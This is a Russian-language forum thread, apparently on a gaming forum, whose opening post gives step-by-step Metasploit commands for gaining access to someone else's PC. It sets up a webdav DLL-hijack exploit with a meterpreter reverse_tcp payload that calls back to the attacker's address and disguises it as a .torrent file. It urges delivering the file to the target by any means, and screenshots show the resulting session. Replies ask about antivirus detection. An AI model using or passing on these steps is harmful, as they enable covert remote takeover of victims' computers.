Подведи собственные итоги года совместно с YOUGAME и забери ценные призы! Перейти

Доступ к чужому ПК с помощью торрент файла

• Автор темы Автор темы Drager
  • Дата начала Дата начала
Работающий пенсионер
Олдфаг
Олдфаг
Статус
Оффлайн
Реакции
1,047
Всем привет! Хочу рассказать как получить сессию(нет не в универе) meterpreter с помощью вируса которого мы создадим и "спрячем" в торрент фаил.

С этой задачей нам поможет справиться Kali Linux 2016.2 Rolling и наличие обновленного Metasploit Framework. В качестве целевого хоста, можно использовать любые окна до 7. На 8/10 не работает. Частичная работоспособность на 8.1.(Зависит от версии)

Итак, запустив Metasploit, вводим следующее:

> use exploit/windows/browser/webdav_dll_hijacker (Выбираем эксплоит)

> msf exploit(webdav_dll_hijacker) >set payload windows/meterpreter/reverse_tcp (Выбираем тип полезной нагрузки)

> set lhost 192.168.0.104 (Определим адрес атакующего хоста)

> set extensions torrent (Выберем тип расширения файла)

> exploit (Запустим работу фреймворка)

Далее, запускается веб-сервер, на атакующем хосте, а по адресу 192.168.0.104\documents\ - будет находиться полезная нагрузка, наша задача состоит в том, чтобы используя всевозможные методы доставить ее на целевой хост.
Откроем на целевом хосте строку “Выполнить” и впишем туда адрес, по которому находится полезная нагрузка
В консоли атакующего хоста видим сигнализационные сообщения:

4382a0297d04.png

Затем, в открывшемся окне на целевом хосте можно наблюдать сгенерированный Metasploit торрент-файл
После его запуска, откроется активная сессия meterpreter:
ffe02c884825.png

Проверим ее:
57d6e276588f.png

В опциях эксплойта, можно изменить директорию и название полезной нагрузки:
d7030c9a25ba.png

На этом пожалуй, все, спасибо за внимание.​

Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
Анити-вирусы реагируют на файл?

Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
Сложна немного :NotLikeThis:

Спасибо, теперь моя жизнь не будет прежней...

В скором времени (завтра или послезавтра) открою несколько тем с терминами и в некотором роде обучением линуксом и большинству его модулям.
Лучше сделай тему о наборе в группу на курс Kali Linux.

Лучше сделай тему о наборе в группу на курс Kali Linux.
Возможно но скорее всего не получится т.к для этого нужно много времени а у меня его не так много хоть и есть. А пробежать по основам и модулям самое то. А дальше: Саморазвитие - путь к успеху!

Возможно но скорее всего не получится т.к для этого нужно много времени а у меня его не так много хоть и есть. А пробежать по основам и модулям самое то. А дальше: Саморазвитие - путь к успеху!
было бы интересно, если бы сделал

Назад
Сверху Снизу